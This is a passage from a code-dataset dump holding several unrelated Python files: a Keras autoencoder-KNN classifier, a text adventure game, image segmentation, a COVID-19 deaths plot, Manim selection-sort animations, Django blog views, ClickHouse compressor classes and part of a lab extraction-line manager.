'filename_iter_memberships': 'membership.npy',\n 'filename_iter_comps': 'best_comps.npy',\n 'filename_iter_lnprob_and_bic': 'lnprob_bic.npy',\n 'filename_lnprob_convergence': 'lnprob_convergence.png',\n\n 'filename_ABC_all_bics': 'all_bics.npy',\n 'filename_ABC_all_bics_figure': 'all_bics.pdf',\n 'filename_figure_bics': 'bics.pdf',\n\n 'filename_bics_list': 'bic_list.npy',\n 'filename_lihelihood_and_bic': 'likelihood_post_and_bic.npy',\n\n # Results\n 'filename_final_memberships': 'final_memberships.npy',\n 'filename_final_components': 'final_comps.npy',\n 'filename_final_lnprob_and_bic': 'final_lnprob_and_bic.npy',\n \n \n 'par_log_file': 'fit_pars.log',\n 'folder_tmp': 'tmp',\n 'filename_log': 'log.log',\n\n\n}\n\n","sub_path":"chronostar/default_pars.py","file_name":"default_pars.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"322058341","text":"from keras.initializers import RandomNormal\nfrom keras.engine.topology import Layer, InputSpec\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.optimizers import SGD\nfrom SKNN import Semi_Supervised_KNN\nimport numpy as np\n\nclass DAEKNN:\n \n def __init__(self, dim, entrada, k):\n self.k = k\n self.entrada = entrada\n self.dim = dim\n \n input_img = Input((self.entrada,))\n #encoded = Dense(50, activation='relu')(input_img)\n #drop = Dropout(0.2)(encoded)\n encoded = Dense(10, activation='relu')(input_img)\n #drop = Dropout(0.2)(encoded)\n #encoded = Dense(100, activation='relu')(drop)\n \n Z = Dense(self.dim, activation='relu')(encoded)\n \n decoded = Dense(10, activation='relu')(Z)\n #drop = Dropout(0.2)(decoded)\n #decoded = Dense(50, activation='relu')(drop)\n #drop = Dropout(0.2)(decoded)\n #decoded = Dense(250, activation='relu')(drop)\n decoded = Dense(self.entrada, activation='sigmoid')(decoded)\n \n self.encoder = Model(input_img, Z)\n self.autoencoder = Model(input_img, decoded)\n #self.autoencoder.summary()\n self.autoencoder.compile(loss='mse', optimizer=SGD(lr=0.1, decay=0, momentum=0.9))\n \n def fit(self,L, U, y):\n PU = self.reducaoZ(U) \n PL = self.encoder.predict(L)\n return self.rotulacao(PL, PU, y)\n \n def reducaoZ(self, X):\n self.autoencoder.fit(X, X, batch_size=30, epochs=50, verbose=False)\n return self.encoder.predict(X)\n \n def rotulacao(self, PL, PU, y):\n self.knn = Semi_Supervised_KNN()\n #print('........... Tamanho Rotulados: ', str(np.size(PL, axis=1)))\n self.rotulos = self.knn.classificar(PL, PU, y, k=self.k)\n return self.rotulos\n \n def predizer(self, L, U, y):\n PL = self.encoder.predict(L)\n PU = self.encoder.predict(U)\n return self.knn.classificar(PL, PU, y, k = self.k)\n ","sub_path":"DAE_KNN.py","file_name":"DAE_KNN.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"577792988","text":"# main.py\n# Midnight Rider\n# a text adventure game that is riveting.\n# IGN gives it 4 stars out of 100\n\nimport random\nimport sys\nimport textwrap\nimport time\n\nINTRODUCTION = \"\"\"\nWELCOME TO MIDNIGHT RIDER\n\nWE'VE STOLEN A CAR. WE NEED TO GET IT HOME. \nTHE CAR IS SPECIAL\n\nTHE GOVERNMENT WANTS IT FOR THEIR GAIN\n\nWE CAN'T LET THAT HAPPEN \n\nONE GOAL: SURVIVAL... AND THE CAR.\nREACH THE END BEFORE THE MAN GON GETCHU\n\n\"\"\"\n\nWIN = \"\"\" \n\nYou pressed the button to open the gate. \nThis isn't the first time you've done this, so you know how to time it exactly.\nJust as the doors close, you slide right into HQ\nYou know you did the right thing, the government would have just torn the car apart.\nThey don't know it's secrets...\nthat it holds the key to different worlds\nAs you step out of the vehicle, Fido runs up to you.\n\"Thanks you for saving me,\" he says \nAs you take a couple steps away from the car makes a strange sound.\nIt changes it shapes.\nYou've seen it before, but only on YV\n\"...Bumblebee?\"\n\"\"\"\n\nLOSE_HUNGER = \"\"\"\nyYOUR STOMACH IS EMPTY.\nWHO KNEW THAT WHAT THE DOCTOR SAID WAS TRUE. \nTHAT HUMAN/ROBOT HYBRIDS WOULD NEED TOFU TO SUSTAIN THEMSELVES.\nYOUR ROBOT SYSTEMS START TO SHUT DOWN\nYOUR HUMAN EYES CLOSE\nTHE LAST THING THAT YOU HEAR ARE SIRENS.\nTHEY GOTCHU. THEY GOT THE CAR\nWE FAILED... \n------ GAME OVER ------\n\"\"\"\n\nLOSE_AGENTS = \"\"\"\nTHE AGENTS\n\"\"\"\n\n\nCHOICES = \"\"\"\n-----\nA. Eat some tofu\nB. Continue ahead at a moderate speed\nC. Speed ahead at full throttle\nD. Stop for fuel at refuelling station. (No food available)\nE. Status check\nQ. Quit\n-----\n\"\"\"\n\ndef type_text_output(text):\n for char in textwrap.dedent(text):\n time.sleep(0.05)\n sys.stdout.write(char)\n sys.stdout.flush()\n\n time.sleep(1)\n\ndef main():\n type_text_output(INTRODUCTION)\n\n # CONSTANTS\n MAX_FUEL_LEVEL = 50\n MAX_TOFU_LEVEL = 3\n MAX_DISTANCE_TRAVELED = 100\n TOFU_CHANCE = 0.03\n\n # Variables\n done = False\n\n km_traveled = 0\n agents_distance = -20.0\n turns = 0\n tofu = MAX_TOFU_LEVEL\n fuel = MAX_FUEL_LEVEL\n hunger = 0\n\n while not done:\n # TODO: Random events\n # Fido\n if random.random() < TOFU_CHANCE:\n # Fido pops up says something and refills tofu\n tofu = MAX_TOFU_LEVEL\n print()\n print(\"****** Your tofu is magically refilled!\")\n print(\"******\\\"you're welcome!\\\" a voice says.\")\n print(\"****** It's Fido.\")\n print(\"****** He's using his tofu cooking skillz.\")\n\n # Check if reached END GAME\n if km_traveled > MAX_DISTANCE_TRAVELED:\n # WIN\n # Print out win scenario (typing way)\n time.sleep(2)\n type_text_output(WIN)\n break\n\n elif hunger > 45:\n # Lose - too hungry\n # print losing hunger scenario\n time.sleep(2)\n type_text_output(LOSE_HUNGER)\n break\n\n elif agents_distance >= 0:\n # LOSE - AGENTS REACHED YOU\n # print losing agents scenario\n time.sleep(2)\n type_text_output(LOSE_AGENTS)\n break\n\n elif fuel <= 0:\n #LOSE - RAN OUT OF FUEL\n pass\n # TODO; PRINT LOSE SCENARIO - FUEL\n break\n\n #Showing hunger\n if hunger > 35:\n print(\"***** Your stomach rumbles. You need to eat something soon.\")\n elif hunger > 20:\n print(\"***** Your hunger is small but manageable.\")\n\n\n\n # Give the player their choices\n print(CHOICES)\n\n # Handle user's input\n users_choice = input(\"What do you want to do?\").lower().strip(\"!,.?\")\n\n if users_choice == \"a\":\n # eat\n if tofu > 0:\n tofu -= 1\n hunger = 0\n print()\n print(\"-------- MMMMMMmmmm. Soybean goodness\")\n print(\"--------- Your hunger is sated.\")\n print()\n\n else:\n print()\n print(\"------- You have none left\")\n print()\n\n elif users_choice == \"b\":\n # drive slow\n player_distance_now = random.randrange(7, 15)\n agents_distance_now = random.randrange(7, 15)\n\n # burn fuel\n fuel -= random.randrange(2, 7)\n\n # Player distance traveled\n km_traveled += player_distance_now\n\n # Agent's distance traveled\n agents_distance -= (player_distance_now - agents_distance_now)\n\n # Feedback to player\n print()\n print(f\"-------- You traveled {player_distance_now} kms!\")\n print()\n\n elif users_choice == \"c\":\n # drive fast\n player_distance_now = random.randrange(10, 16)\n agents_distance_now = random.randrange(7 ,15)\n\n # Burn fuel\n fuel -= random.randrange(5, 11)\n\n # player distance traveled\n km_traveled += player_distance_now\n\n # agents distance traveled\n agents_distance -= (player_distance_now - agents_distance_now)\n\n # feedback to player\n print()\n print(f\"-------- you sped ahead {player_distance_now} kms!\")\n print()\n\n elif users_choice == \"d\":\n # refuel\n # fill the fuel tank\n fuel = MAX_FUEL_LEVEL\n\n # consider the agents coming close\n agents_distance += random.randrange(7, 15)\n\n # give the user feedback\n print()\n print(\"--------- You filled the fuel tank\")\n print(\"-------- The agents got closer...\")\n print()\n\n elif users_choice == \"e\":\n print(f\"\\t---Status Check---\")\n print(f\"\\tkms traveled: {km_traveled} kms\")\n print(f\"\\tFuel left: {fuel} L\")\n print(f\"\\tAgents are {abs(agents_distance)} kms\")\n print(f\"\\tYou have {tofu} tofu left\")\n print(\"\\t------\\n\")\n\n elif users_choice == \"q\":\n done = True\n\n # Increase hunger\n if users_choice not in [\"a\", \"e\"]:\n hunger += random.randrange(5, 13)\n turns += 1\n\n # Pause\n time.sleep(1.2)\n\n # Outroduction\n print(\"Thanks for playing! Please play again :) \")\n print(\"You finished the game in {turns} turns.\")\n\nif __name__ == '__main__':\n main()","sub_path":"main.py2.py","file_name":"main.py2.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"291120080","text":"#!/usr/bin/env python3\nimport sys, numpy\nfrom scipy import misc\n\nlabels = ['sea', 'lake', 'vegetation', 'builtup']\nsamples = [3, 1, 4, 1]\ncolors = [0, 75, 128, 255]\nmeans = numpy.zeros(shape=(4, 3))\n\nfor i in range(len(labels)):\n sumation = numpy.zeros(shape=(3,))\n count = 0\n images = map(lambda x: labels[i]+x+'.png', [''] if samples[i] == 1 else map(str, range(1, 1+samples[i])))\n for image in images:\n data = misc.imread(image)\n sumation += numpy.sum(data, axis=(0, 1))\n count += data.shape[0]*data.shape[1]\n means[i] = sumation/count\nmeans = numpy.array(means)\n\nif len(sys.argv) < 2 or sys.argv[1] not in ['eu', 'man']:\n print('Unknown option')\nelse:\n data = misc.imread('mumbai.png')\n if sys.argv[1] == 'eu':\n data = numpy.array([numpy.linalg.norm(data-mean, axis=(2,)) for mean in means])\n else:\n data = numpy.array([numpy.sum(numpy.abs(data-mean), axis=(2,)) for mean in means])\n data = numpy.argmin(data, axis=0)\n data = numpy.vectorize(lambda x: colors[x])(data)\n misc.imsave('segmented_'+sys.argv[1]+'.png', data)\n","sub_path":"170050034-170050094-170050096-outlab11/P1/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"460722173","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\ndf = pd.read_csv(\"datasets/covid_19_data_tr.csv\") \r\n\r\nfirst_wave = df['Deaths'].iloc[:32]\r\nsecond_wave = df['Deaths'].iloc[32:63]\r\nthird_wave = df['Deaths'].iloc[63:95]\r\nfourth_wave = df['Deaths'].iloc[95:126]\r\nfig,axs = plt.subplots(2,2)\r\n\r\nyil1 = df['Last_Update'].iloc[:32]\r\nyil2 = df['Last_Update'].iloc[32:63]\r\nyil3 = df['Last_Update'].iloc[63:95]\r\nyil4 = df['Last_Update'].iloc[95:126]\r\n\r\naxs[0,0].grid() # tabloyu kareli yapıyor\r\naxs[0,1].grid()\r\naxs[1,0].grid() \r\naxs[1,1].grid()\r\naxs[0,0].set_title(\"İLK AY\") # 1. ye title atadık\r\naxs[0,1].set_title(\"İKİNCİ AY\") # 2. ye title atadık\r\naxs[1,0].set_title(\"ÜÇÜNCÜ AY\") # 3. ye title atadık\r\naxs[1,1].set_title(\"DÖRDÜNCÜ AY\") # 4. ye title atadık\r\naxs[0,0].plot(yil1,first_wave, 'o--r')\r\naxs[0,0].set_xticklabels(yil1, rotation=70) # yazıları 70 derece döndürtüyor\r\n\r\naxs[0,1].plot(yil2,second_wave, 'o--r')\r\naxs[0,1].set_xticklabels(yil2, rotation=70)\r\n\r\naxs[1,0].plot(yil3,third_wave, 'o--r')\r\naxs[1,0].set_xticklabels(yil3, rotation=70)\r\n\r\naxs[1,1].plot(yil4,fourth_wave, 'o--r')\r\naxs[1,1].set_xticklabels(yil4, rotation=70)\r\nplt.tight_layout()\r\nfig.suptitle(\"COVID-19 DEATHS IN TURKEY\")\r\nplt.savefig('datasets/covid.pdf') # pdf olarak pc ye kaydettik\r\nplt.legend() # tabloların arasını açıp görüntüyü düzelltik\r\nplt.show() # tabloyu açar\r\n\r\n\r\n","sub_path":"deaths_of_covid_table.py","file_name":"deaths_of_covid_table.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"245539204","text":"from manimlib.imports import *\nfrom vivek.vid_0003_selection_sort.code import Code\n\nclass Opening(Scene):\n def construct(self):\n text = TextMobject(\"Computer Science by Pandey\")\n\n subtext = TextMobject(\"One video: One snack sized topic\")\n topic = TextMobject(\"SELECTION SORT\")\n topic.set_color(BLUE)\n VGroup(text, subtext, topic).arrange(DOWN)\n self.play(FadeIn(text), FadeIn(subtext))\n self.wait(15)\n self.play(FadeOut(text), FadeOut(subtext))\n\nclass Topic(Scene):\n def swap(self, later, former, run_time=1):\n multiple = 0.8\n delta = 0\n later_stick = self.array1[self.seq[later]]\n former_stick = self.array1[self.seq[former]]\n\n self.play(ApplyMethod(self.array1[self.seq[later]].set_color, RED))\n\n later_stick.generate_target()\n later_stick.target.next_to(later_stick, 2 * UP)\n former_stick.generate_target()\n former_stick.target.next_to(former_stick, 2 * DOWN)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n\n shift = (later - former) * multiple + delta\n\n later_stick.generate_target()\n later_stick.target.shift(shift * LEFT)\n former_stick.generate_target()\n former_stick.target.shift(shift * RIGHT)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n\n later_stick.generate_target()\n later_stick.target.next_to(later_stick, 2 * DOWN)\n former_stick.generate_target()\n former_stick.target.next_to(former_stick, 2 * UP)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n \n self.seq[later], self.seq[former] = self.seq[former], self.seq[later]\n \n def construct(self):\n topic = TextMobject(\"SELECTION SORT\")\n topic.scale(2)\n topic.set_color(BLUE)\n self.play(Write(topic))\n\n self.num_elems1 = 7\n self.nums1 = [23, 25, 19, 28, 14, 17, 20]\n self.seq = [0, 1, 2, 3, 4, 5, 6]\n side_length = 0.8\n self.squares1 = [Square(side_length=side_length) for i in range(self.num_elems1)]\n self.boxes1 = VGroup(*self.squares1).arrange(RIGHT, buff=0).to_edge(TOP, buff=SMALL_BUFF)\n\n g = VGroup(self.boxes1).arrange(RIGHT).next_to(topic, DOWN, buff=10 * SMALL_BUFF)\n\n num_mobjects1 = [TextMobject(\"$a_\" + str(i) + \"$\") for i in range(self.num_elems1)]\n self.array1 = VGroup(*num_mobjects1).arrange(RIGHT, buff=3.8*SMALL_BUFF)\n self.array1.next_to(self.boxes1[0], RIGHT, buff=-6*SMALL_BUFF)\n self.play(FadeIn(self.array1), FadeIn(g))\n self.swap(4, 0)\n self.swap(6, 1)\n self.swap(3, 2)\n self.swap(5, 3)\n self.wait(15)\n\nclass Tree(VGroup):\n class MyEllipse(Ellipse):\n def __init__(self, **kwargs):\n CONFIG = {\n \"stroke_width\": 3\n }\n super().__init__(**CONFIG)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n root = self.MyEllipse()\n root.scale(0.5)\n root.to_corner(UP)\n\n child1 = self.MyEllipse()\n child1.scale(0.5)\n child1.next_to(root, 4 * DOWN + LEFT)\n\n child2 = self.MyEllipse()\n child2.scale(0.5)\n child2.next_to(root, 4 * DOWN + RIGHT)\n\n child11 = self.MyEllipse()\n child11.scale(0.5)\n child11.next_to(child1, 4 * DOWN + LEFT)\n\n child12 = self.MyEllipse()\n child12.scale(0.5)\n child12.next_to(child1, 4 * DOWN + RIGHT)\n\n child22 = self.MyEllipse()\n child22.scale(0.5)\n child22.next_to(child2, 4 * DOWN + RIGHT)\n\n child121 = self.MyEllipse()\n child121.scale(0.5)\n child121.next_to(child12, 4 * DOWN + LEFT)\n\n child122 = self.MyEllipse()\n child122.scale(0.5)\n child122.next_to(child12, 4 * DOWN + RIGHT)\n\n child1211 = self.MyEllipse()\n child1211.scale(0.5)\n child1211.next_to(child121, 4 * DOWN + LEFT)\n\n child1212 = self.MyEllipse()\n child1212.scale(0.5)\n child1212.next_to(child121, 4 * DOWN + RIGHT)\n\n arrow1 = Arrow(root.get_bottom(), child1.get_top(), stroke_width=3)\n arrow1.scale(0.8)\n\n arrow2 = Arrow(root.get_bottom(), child2.get_top())\n arrow2.scale(0.8)\n\n arrow11 = Arrow(child1.get_bottom(), child11.get_top())\n arrow11.scale(0.8)\n\n arrow12 = Arrow(child1.get_bottom(), child12.get_top())\n arrow12.scale(0.8)\n\n arrow22 = Arrow(child2.get_bottom(), child22.get_top())\n arrow22.scale(0.8)\n\n arrow121 = Arrow(child12.get_bottom(), child121.get_top())\n arrow121.scale(0.8)\n\n arrow122 = Arrow(child12.get_bottom(), child122.get_top())\n arrow122.scale(0.8)\n\n arrow1211 = Arrow(child121.get_bottom(), child1211.get_top())\n arrow1211.scale(0.8)\n\n arrow1212 = Arrow(child121.get_bottom(), child1212.get_top())\n arrow1212.scale(0.8)\n\n self.add(root, \n child1,\n child2,\n child11,\n child12,\n child22,\n child121,\n child122,\n child1211,\n child1212,\n arrow1,\n arrow2,\n arrow11,\n arrow12,\n arrow22,\n arrow121,\n arrow122,\n arrow1211,\n arrow1212,\n )\n \nclass RealWorld(Scene):\n def construct(self):\n algo_world, rect1 = self.get_algo_world()\n real_world, rect2 = self.get_real_world()\n arrow = self.get_arrow(rect1, rect2)\n\n self.play(Write(algo_world))\n self.wait(2)\n self.play(Write(rect1))\n self.wait(1)\n\n self.play(Write(arrow))\n\n self.play(Write(real_world))\n self.wait(2)\n self.play(Write(rect2))\n self.wait(12)\n\n def get_algo_world(self):\n t = Tree()\n t.scale(0.5)\n\n squares = [Square(side_length=0.5) for i in range(7)]\n boxes = VGroup(*squares).arrange(RIGHT, buff=0)\n\n lines = [\n \"for (i = 0; i < n; i++) \\{\",\n \"SPACEfor (j = 0; j < n; j++) \\{\",\n \"\\\\vdots\"\n ]\n codes = [Code(line) for line in lines]\n c = VGroup(*codes).arrange(DOWN).to_edge(RIGHT + DOWN)\n for i in range(0, len(codes)):\n x_diff = 1.4 + 0.65 * lines[i].count('SPACE')\n if 'vdots' in lines[i]:\n x_diff = 4.5\n codes[i].align_to((x_diff, 0, 0), LEFT)\n self.add(c)\n \n x = VGroup(t, boxes, c).arrange(DOWN, buff = LARGE_BUFF)\n x.scale(0.9)\n x.to_edge(LEFT, buff=LARGE_BUFF)\n return x, SurroundingRectangle(x)\n\n def get_real_world(self):\n r1 = SVGMobject(file_name = 'eagle-svgrepo-com.svg').scale(0.5)\n r2 = SVGMobject(file_name = 'mountain-climb-svgrepo-com.svg').scale(0.5)\n r3 = SVGMobject(file_name = 'hummingbird-svgrepo-com.svg').scale(0.5)\n r4 = SVGMobject(file_name = 'lion-face-svgrepo-com.svg').scale(0.5)\n r5 = SVGMobject(file_name = 'tree-swallow-svgrepo-com.svg').scale(0.5)\n\n x1 = VGroup(r1, r2).arrange(DOWN, buff = LARGE_BUFF)\n x2 = VGroup(r3, r4, r5).arrange(DOWN, buff = LARGE_BUFF)\n y = VGroup(x1, x2).arrange(RIGHT, buff = LARGE_BUFF)\n y.to_edge(RIGHT, buff=10*SMALL_BUFF + LARGE_BUFF)\n rect2 = SurroundingRectangle(y, buff=6*SMALL_BUFF)\n return y, rect2\n\n def get_arrow(self, rect1, rect2):\n return Arrow(rect1.get_right(), rect2.get_left())\n","sub_path":"vivek/vid_0003_selection_sort/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"453495044","text":"from django.shortcuts import render, redirect\nfrom .models import Post, BlogComment\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nimport math\nfrom django.core.paginator import Paginator # this for pagination\n\n\n# Create your views here.\n#def bloghome(request):\n# allposts = Post.objects.all()\n# context = {'allPosts': allposts}\n# return render(request, \"blog/blogHome.html\", context)\n\n\ndef bloghome(request):\n no_of_posts = 2\n #if request.GET(\"pageno\")\n page = request.GET.get('page')\n if page is None:\n page = 1\n else:\n page = int(page)\n\n\n \"\"\"\n 1: 0-3\n 2: 3-6\n 3: 6-9\n \n 1: 0 to 0 + no_of_posts\n 2: no_of_posts to no_of_posts + no_of_posts\n 3: no_of_posts + no_of_posts to no_of_posts+ no_of_posts +no_of_posts\n\n (page -1)* no_of_posts to page* no_of_posts\n \"\"\"\n\n allposts = Post.objects.all()\n length = len(allposts)\n allposts = allposts[(page-1)*no_of_posts: page* no_of_posts]\n if page>1:\n prev = page - 1\n else:\n prev = None\n\n if page 78:\n allPosts = Post.objects.none()\n else:\n allPostsTitle = Post.objects.filter(title__icontains=query)\n allPostsAuthor = Post.objects.filter(author__icontains=query)\n allPostsContent = Post.objects.filter(content__icontains=query)\n allPosts = allPostsTitle.union(allPostsContent, allPostsAuthor)\n\n # next for pagination...\n paginator = Paginator(allPosts, 1) # Show 5 posts per page.\n page_number = request.GET.get('page') \n page_obj = paginator.get_page(page_number)\n\n if allPosts.count() == 0:\n messages.warning(request, \"No search results found. Please refine your query.\")\n params = {'allPosts': allPosts, 'query': query, 'page_obj': page_obj}\n return render(request, 'blog/search.html', params)\n\n\ndef blogPost(request, slug):\n post = Post.objects.filter(slug=slug).first()\n post.views = post.views + 1\n post.save()\n\n comments = BlogComment.objects.filter(post=post, parent=None)\n replies = BlogComment.objects.filter(post=post).exclude(parent=None)\n replyDict = {}\n for reply in replies:\n if reply.parent.sno not in replyDict.keys():\n replyDict[reply.parent.sno] = [reply]\n else:\n replyDict[reply.parent.sno].append(reply)\n context = {'post': post, 'comments': comments, 'user': request.user, 'replyDict': replyDict}\n\n return render(request, \"blog/blogPost.html\", context)\n\n\ndef postComment(request):\n if request.method == \"POST\":\n comment = request.POST.get('comment')\n user = request.user\n postSno = request.POST.get('postSno')\n post = Post.objects.get(sno=postSno)\n parentSno = request.POST.get('parentSno')\n if parentSno == \"\":\n comment = BlogComment(comment=comment, user=user, post=post)\n comment.save()\n messages.success(request, \"Your comment has been posted successfully\")\n else:\n parent = BlogComment.objects.get(sno=parentSno)\n comment = BlogComment(comment=comment, user=user, post=post, parent=parent)\n comment.save()\n messages.success(request, \"Your reply has been posted successfully\")\n\n return redirect(f\"/blog/{post.slug}/\")","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306849342","text":"from io import BytesIO\n\ntry:\n from clickhouse_cityhash.cityhash import CityHash128\nexcept ImportError:\n raise RuntimeError(\n 'Package clickhouse-cityhash is required to use compression'\n )\n\nfrom .. import errors\n\n\nclass BaseCompressor(object):\n \"\"\"\n Partial file-like object with write method.\n \"\"\"\n method = None\n method_byte = None\n\n def __init__(self):\n self.data = BytesIO()\n\n super(BaseCompressor, self).__init__()\n\n def get_value(self):\n value = self.data.getvalue()\n self.data.seek(0)\n self.data.truncate()\n return value\n\n def write(self, p_str):\n self.data.write(p_str)\n\n def get_compressed_data(self, extra_header_size):\n raise NotImplementedError\n\n\nclass BaseDecompressor(object):\n method = None\n method_byte = None\n\n def __init__(self, real_stream):\n self.stream = real_stream\n super(BaseDecompressor, self).__init__()\n\n def check_hash(self, compressed_data, compressed_hash):\n if CityHash128(compressed_data) != compressed_hash:\n raise errors.ChecksumDoesntMatchError()\n\n def get_decompressed_data(self, method_byte, compressed_hash,\n extra_header_size):\n raise NotImplementedError\n","sub_path":"clickhouse_driver/compression/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181550883","text":"\ndef load_data(name):\n data = []\n with open(f'./{name}') as f:\n size = f.readline()\n size = int(size)\n sum = 0\n for line in f:\n try:\n f_v, s_v = line.split(' ')\n except:\n f_v, s_v = line.split(' ')\n f_v = int(f_v)\n s_v = int(s_v)\n difference = abs(f_v - s_v)\n data.append([f_v, s_v, difference])\n sum += max(f_v, s_v)\n return size, data, sum\n\n\ndef search_max_sum(name):\n size, data, sum = load_data(name)\n while (sum % 3) == 0:\n min_dif = 300000\n pair_index = 0\n for i in range(0, size):\n dif_pair = data[i][2]\n\n if min_dif > dif_pair and dif_pair % 3 != 0:\n min_dif = dif_pair\n pair_index = i\n f_v = data[pair_index][0]\n s_v = data[pair_index][1]\n sum -= max([f_v, s_v])\n sum += min([f_v, s_v])\n\n if sum % 3 == 0:\n data[pair_index][2] = 300000\n sum += max([f_v, s_v])\n sum -= min([f_v, s_v])\n print(sum)\n\n\ndef main():\n file_name = ['27-A.txt', '27-B.txt']\n for name in file_name:\n search_max_sum(name)\n\n\nmain()\n","sub_path":"task-27.py","file_name":"task-27.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"441055475","text":"#===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n#=============enthought library imports=======================\nfrom traits.api import Instance\nfrom traitsui.api import View, Item, VSplit\n#=============standard library imports ========================\nimport os\nimport time\nfrom threading import Thread, Event\nimport pickle\n#=============local library imports ==========================\nfrom src.extraction_line.explanation.extraction_line_explanation import ExtractionLineExplanation\nfrom src.extraction_line.extraction_line_canvas import ExtractionLineCanvas\nfrom src.paths import paths\nfrom src.managers.manager import Manager\nfrom src.pyscripts.manager import PyScriptManager\nfrom src.monitors.system_monitor import SystemMonitor\n\nfrom view_controller import ViewController\n# from src.managers.multruns_report_manager import MultrunsReportManager\n\n# Macro = None\n# start_recording = None\n# stop_recording = None\n# play_macro = None\n\n\nclass ExtractionLineManager(Manager):\n '''\n Manager for interacting with the extraction line\n contains 2 interaction canvases, 2D and 3D\n contains reference to valve manager, gauge manager and laser manager\n \n '''\n canvas = Instance(ExtractionLineCanvas)\n explanation = Instance(ExtractionLineExplanation, ())\n\n valve_manager = Instance(Manager)\n gauge_manager = Instance(Manager)\n# environmental_manager = Instance(Manager)\n# device_stream_manager = Instance(Manager)\n multiplexer_manager = Instance(Manager)\n multruns_report_manager = Instance(Manager)\n# multruns_report_manager = Instance(MultrunsReportManager)\n\n view_controller = Instance(ViewController)\n\n# pumping_monitor = Instance(PumpingMonitor)\n\n runscript = None\n\n pyscript_editor = Instance(PyScriptManager)\n monitor = Instance(SystemMonitor)\n\n learner = None\n mode = 'normal'\n _update_status_flag = None\n _monitoring_valve_status = False\n _valve_state_frequency = 3\n _valve_lock_frequency = 10\n\n def test_connection(self):\n return self.get_valve_states() is not None\n\n def get_subsystem_module(self, subsystem, module):\n '''\n '''\n try:\n ss = getattr(self, subsystem)\n return ss.get_module(module)\n except AttributeError:\n self.warning('{} not initialized'.format(subsystem))\n\n\n def _create_manager(self, klass, manager, params, **kw):\n gdict = globals()\n if klass in gdict:\n class_factory = gdict[klass]\n else:\n # try a lazy load of the required module\n if 'fusions' in manager:\n package = 'src.managers.laser_managers.{}'.format(manager)\n self.laser_manager_id = manager\n elif 'rpc' in manager:\n package = 'src.rpc.manager'\n else:\n package = 'src.managers.{}'.format(manager)\n\n class_factory = self.get_manager_factory(package, klass, warn=False)\n if class_factory is None:\n package = 'src.extraction_line.{}'.format(manager)\n class_factory = self.get_manager_factory(package, klass)\n\n if class_factory:\n# params['application'] = self.application\n m = class_factory(**params)\n\n if manager in ['gauge_manager',\n 'valve_manager',\n 'multiplexer_manager',\n # 'environmental_manager', 'device_stream_manager',\n 'multruns_report_manager',\n ]:\n self.trait_set(**{manager:m})\n else:\n self.add_trait(manager, m)\n\n # m.exit_on_close = False\n\n return m\n\n def finish_loading(self):\n '''\n '''\n if self.mode != 'client':\n self.monitor = SystemMonitor(manager=self,\n name='system_monitor'\n )\n self.monitor.monitor()\n\n# if self.gauge_manager is not None:\n# self.gauge_manager.on_trait_change(self.pressure_update, 'gauges.pressure')\n# def close(self, isok):\n# e = self.explanation\n# self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n def closed(self, ok):\n self.info('stopping status monitor')\n if self._update_status_flag:\n self._update_status_flag.set()\n\n if self.gauge_manager:\n self.gauge_manager.stop_scans()\n\n if self.monitor:\n self.monitor.stop()\n return True\n\n def opened(self, ui):\n super(ExtractionLineManager, self).opened(ui)\n self.reload_scene_graph()\n p = os.path.join(paths.hidden_dir, 'show_explanantion')\n if os.path.isfile(p):\n with open(p, 'rb') as f:\n try:\n self.show_explanation = pickle.load(f)\n except pickle.PickleError:\n pass\n\n if self.mode == 'client':\n self.start_status_monitor()\n else:\n if self.gauge_manager:\n self.info('start gauge scans')\n self.gauge_manager.start_scans()\n\n def start_status_monitor(self):\n def func():\n self._monitoring_valve_status = True\n cnt = 0\n state_freq = self._valve_state_frequency\n lock_freq = self._valve_lock_frequency\n vm = self.valve_manager\n while not self._update_status_flag.isSet():\n time.sleep(1)\n if cnt % state_freq == 0:\n vm.load_valve_states()\n if cnt % lock_freq == 0:\n vm.load_valve_lock_states()\n\n cnt += 1\n if cnt > 100:\n cnt = 0\n\n self.info('status monitor stopped')\n self._monitoring_valve_status = False\n\n if self._update_status_flag is None:\n self._update_status_flag = Event()\n\n self._update_status_flag.clear()\n if 